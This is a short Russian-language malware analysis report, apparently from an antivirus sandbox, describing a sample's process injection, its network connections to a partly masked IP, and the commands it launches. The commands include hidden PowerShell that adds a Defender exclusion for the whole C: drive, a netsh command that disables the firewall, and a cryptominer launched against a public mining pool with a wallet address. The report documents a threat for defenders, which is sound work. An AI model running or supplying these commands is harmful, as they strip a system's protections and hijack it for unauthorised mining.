Техническая информация
Вредоносные функции
Внедряет код в
следующие системные процессы:
- %WINDIR%\microsoft.net\framework\v4.0.30319\applaunch.exe
Сетевая активность
Подключается к
- '37.##5.54.26':8362
TCP
Запросы HTTP POST
- http://37.###.54.26:8362/ via 37.##5.54.26
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' %ALLUSERSPROFILE%\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name Enable...' (со скрытым окном)
- '%ALLUSERSPROFILE%\systemd\mvsc32.exe' --url pool.hashvault.pro:80 --user 49QjFe3jmGzJUr9K1Uoax1gay6mESvcFjACYJVMPATBWWV5DJdoD4qgeQD3JrtmtqZJgDmHP1nvagRP3QRTZXUPWHP9F4cx --pass x' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\microsoft.net\framework\v4.0.30319\applaunch.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' %ALLUSERSPROFILE%\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name Enable...
- '<SYSTEM32>\netsh.exe' advfirewall set allprofiles state off
